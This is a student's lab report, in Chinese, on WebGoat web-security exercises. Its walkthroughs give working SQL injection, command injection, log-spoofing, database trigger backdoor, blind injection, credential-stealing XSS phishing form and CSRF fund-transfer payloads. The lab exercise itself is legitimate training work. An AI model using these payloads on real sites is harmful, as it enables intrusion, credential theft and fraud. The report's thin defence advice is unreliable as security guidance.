2019-2020-2 20174308 帅嵩《网络对抗技术》 Exp9 Web安全基础
目录:
一、实践目标
二、基础知识
三、实践过程
四、基础问题回答
五、实践总结
一、实践目标
1.1实践内容
- 做不少于7个关于SQL,XSS,CSRF的实验
二、基础知识
- SQL注入
- 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串达到欺骗服务器执行恶意的SQL命令,即利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句;
- 输入的用户名' or 1=1#中#相当于注释符,把后面的内容都注释掉,1=1是永真式,条件永远成立,和代码中select语句组合后变成select * from login5121_table where username='' or 1=1# ' and password='',不管密码是否输入正确,都能够成功登录。
- XSS攻击
- 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,比如这些代码包括HTML代码和客户端脚本,攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy),这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。
- CSRF(Cross-site request forgery)
- CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性
三、实践过程
3.1 WebGoat的安装
到网站【https://github.com/WebGoat/WebGoat/releases/tag/7.0.1】,下载【webgoat-container-7.0.1-war-exec.jar】。
WebGoat默认使用8080端口,开启前先查看端口是否被占用: 【netstat -tupln | grep 8080】。如果被占用则杀死进程
从有【webgoat-container-7.0.1-war-exec.jar】文件目录的命令行中输入【java -jar webgoat-container-7.0.1-war-exec.jar】 开启WebGoat
等待一段时间后,发现Starting ProtocolHandler 字样,即开启成功。
打开浏览器访问【localhost:8080/WebGoat】
WebGoat登陆成功后发现左侧无选项
如果左侧未出现选项,原因是编译后的java程序与Linux上的java Se版本不一致而产生的错误,需要重新下载jdk,解决方法如下:
下载jdk1-8。链接【https://pan.baidu.com/s/18QGn2Tc2kDNJVflqwfgghA】
建立目录,将下载的jdk复制过去并解压。参考博客【https://www.jianshu.com/p/9ec7838411c8】。
配置环境变量:【vim /etc/profile】 ,复制以下代码到文件结尾
JAVA_HOME=/usr/local/java/jdk1.8.0_161
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
通知系统java位置
设置默认JDK。
重新载入profile,并且重复之前的操作,页面左侧有选项。
3.2SQL注入攻击
3.2.1.Command Injection(命令注入)
技术概念:命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。
原理:在正常的参数提交过程中,添加恶意的代码,往往能够得到以外的收获。
目标:能够在目标主机上执行任何系统命令
操作方法:
在左侧菜单栏中选择【 Injection Flaws->Command Injection】
右键点击复选框选择Inspect Element审查网页元素对源代码<option>进行修改,在复选框中任意一栏的代码后添加【"& netstat -an & ipconfig"】
点击 View 可以看到网络端口使用情况和 IP 地址
3.2.2Numeric SQL Injection(数字型SQL注入)
技术概念 :SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁
原理:在 station 字段中注入特征字符,能组合成新的 SQL 语句。
SELECT * FROM weather_data WHERE station = [station]
在左侧菜单栏中选择 Injection Flaws->Command Injection
右键点击复选框选择 Inspect Element 审查网页元素对源代码<option>进行修改,在在选中的城市编号【value="101"】后添加or 1=1
可以看到所有城实的天气
选择【columbia】,可查看所有的天气。
3.2.3Log Spoofing(日志欺骗)
原理:这种攻击是在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹
目标:灰色区域代表在 Web 服务器的日志中的记录的内容,我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”
操作方法:
利用回车0D%和换行符%0A让其在日志中两行显示
在User Name中填入【webgoat%0d%0aLogin Succeeded for username: 20174308ss】
点击Login可以看到【webgoat Login Fail】,和自己添加的【20174308ss Login Succeeded】
3.2.4String SQL Injection(字符串型注入)
目标 基于查询语句构造自己的SQL注入字符串,显示所有信用卡信息
操作方法:
使用'提前闭合"",插入永真式1=1,--注释掉后面的内容
输入查询的用户名【yb' or 1=1--select】表里面的所有数据
3.2.5LAB: SQL Injection
目标:使用 SQL 注入绕过认证
操作方法:
右键点击页面,选择inspect Element审查网页元素对源代码进行修改,将password密码框的最大长度限制改为20
以用户Neville登录,输入密码【hj' or '1' = '1】,攻击成功,得到所有人员列表
3.2.6Database Backdoors(数据库后门)
原理:数据库通常作为一个 Web 应用程序的后端来使用。此外,它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另 一个数据库操作,如 insert, select, update or delete。举个例子:攻击者可以创建一个触发器, 该触发器在创建新用户时,将每个新用户的 Email 地址设置为攻击者的地址。
目标:我们的目标是学习如何利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库,不支持触发器,所以该课程不会真正完成。 我们的 Login ID 是 101。
操作方法:
输入101,得到该用户的信息
输入注入语句【101; update employee set salary=8000】执行两个语句
输入【101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='chaowendao@outlook.com'WHERE userid = NEW.userid】 注入一个充当SQL后门的触发器
分析:
BEFORE/AFTER参数指定了触发执行的时间,在事件之前或是之后
FOR EACH ROW表示任何一条记录上的操作满足触发事件都会触发该触发器,也就是说触发器的触发频率是针对每一行数据触发一次
3.2.7Blind Numeric SQL Injection(数字型盲注入)
原理:某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。
操作方法:
本实验中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN数值。尽管如此,我们可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;
如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用 AND 函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐号有效,否则无效。
输入查询语句101 AND 1=1 ,因为两个条件都成立,所以页面返回帐号有效
输入查询语句101 AND 1=2 ,有一个条件不成立,所以返回账号无效
针对查询语句的后半部分构造复杂语句【101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );】
如果页面提示帐号有效,说明PIN>10000,否则PIN<=10000;不断调整数值,可以利用二分法,最终判断出PIN数值的大小为2364。
3.2.8Blind String SQL Injection(字符串型盲注入)
目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或 假)测试检查数据库中其它条目信息。
我们的目标是找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本课程。
操作方法:
本节内容与上一节很类似,最大的不同是要查询的字段是一个字符串而不是数值。
判断字符是否比目标字符小,也通过同样的方法得到结果。
3.3XXS攻击
3.3.1Phishing with XSS 跨站脚本钓鱼攻击
技术概念:在服务端对所有输入进行验证总是不错的做法。当用户输入非法 HTTP 响应时容易造成 XSS。在 XSS 的帮助下,您可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
原理:如果有权限操作页面源代码,那么 HTML 文档的内容是可以被篡改的。
目标:创建一个 form,要求填写用户名和密码。将数据提交到黑客服务器
<head> <body> <div> <div style="float:left;height:100px;width:50%;background-color:green;"></div> <div style="float:left;height:100px;width:50%;background-color:red;"></div> </div> <div style="background-color:blue;height:200px;clear:both;"></div> </div></div> </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>
在新建的表单中,输入用户名和密码,读取在表单上输入的用户名和密码信息并发送给捕获这些信息的WebGoat
3.3.2存储型XSS攻击(Stored XSS Attacks)
原理: 这种攻击常见于论坛等留言平台,用户留言的时候输入一段JavaScript脚本,这段脚本就会被保存在数据库中。因为是留言,所以任何用户在打开网页的时候,这个脚本就会被从数据库中取出来而运行。
目标:创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容
在title中任意输入字符,留言板中输入【<script>alert("You've been attacked!20174308 shuaisong");</script>】后点击Submit攻击成功
3.3.3反射型XSS攻击(Reflected XSS Attacks)
技术概念:在反射的XSS攻击中,攻击者可以使用攻击脚本创建一个URL,并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。
目标:通过使用攻击脚本创建一个URL,并将其发布到另一个网站,通过电子邮件引诱用户点击实现攻击
在Enter your three digit access code中输入代码【<script>alert("You've been attacked!!20174308 shuaisong");</script>】,点击purchase的同时页面就给出了反馈
3.4CSRF攻击
3.4.1跨站请求伪造(Cross Site Request Forgery (CSRF))
原理:跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如下代码所示:
<imgsrc="https://www.mybank.com/me?transferFunds=5000&to=123456"/>
当受害者的浏览器试图呈现此页面时,它将使用指定的参数向www.mybank.com的“me”端点发出请求。浏览器将请求链接以获得图像,即使它实际上是一个资金转移功能。提交请求时,浏览器将添加与站点相关的所有cookie。因此,如果用户对站点进行了身份验证,并且拥有永久或当前会话cookie,那么站点将无法将其与合法的用户请求区分开来。通过这种方式,攻击者可以让受害者执行他们不打算执行的操作,比如“购买物品”,或者脆弱网站提供的任何其他功能。
操作方法:
查看页面右侧Parameters中的src和menu值,分别为292和900
在title中输入任何参数,message框中输入【<img src="http://localhost:8080/WebGoat/attack?Screen=292&menu=900&transferFunds=5000" width="1" height="1" />】,以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交
设置高度和宽度的目的是为了隐藏该图片
在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
3.4.2绕过 CSRF 确认( CSRF Prompt By‐Pass)
主题:实现跨站请求伪造攻击(CSRF),包括通过多个请求绕过用户确认脚本命令
原理:跨站点请求伪造(CSRF/XSRF)是一种攻击,它欺骗受害者加载包含“伪造请求”的页面,以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案,但如果提示符是可编写脚本的,则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示,例如向导或发出多个不相关的伪造请求。
操作方法:
查看页面右侧Parameters中的src和menu值分别为301和900
并在title框中随意输入,message框中输入代码:
<iframe src="attack?Screen=301&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=301&menu=900&transferFunds=CONFIRM"> </iframe>
在Message List中生成以Title命名的链接,点击进入后,攻击成功
四、基础问题回答
- SQL注入攻击原理,如何防御
- 原理:SQL注入攻击就是把命令插入到web表单递交或输入域名等其他信息时,来达到欺骗服务器执行我们输入的SQL指令的目的
- 防御方式:
- 注入关键字的过滤
- 区分权限,严格区分普通用户与系统管理员用户的权限
- 数据库加密
- XXS攻击的原理,如何防御
- 原理:XSS攻击是利用网页开发时留下的漏洞,将恶意代码植入网页,使用户加载并执行攻击者恶意制造的网页程序。成功后,可以进行越权操作、获取私密网页内容等各种内容。
- 防御方式:
- 后台数据过滤
- 设定输入的内容的长度
- 定期检查网页的漏洞
- CSRF攻击的原理,如何防御
- 原理:CSRF是通过伪装成受信任的用户,利用他们的请求来访问攻击网站
- 防御方式:
- 添加随机的验证码
- 网页不设置记录账号密码
五、实践总结
最后一次实验了!有点激动,这次实验是通过WebGoat这个平台,学习了一些关于SQL注入,XXS攻击,CRSF攻击相关的知识,并进行实践。给我一种全新的感觉,好神奇啊,原来网页攻击就是这样的,不经意之间。这次实验我觉得比较有意思的就是sql注入攻击,通过输入一些sql指令,就可以实现攻击,好神奇!通过这次实验,我觉得虽然依照步骤做出来了,但是里面有巨大的知识需要去学习,数据库的知识,网页的相关知识,漏洞比较多,今后要不断的学习。
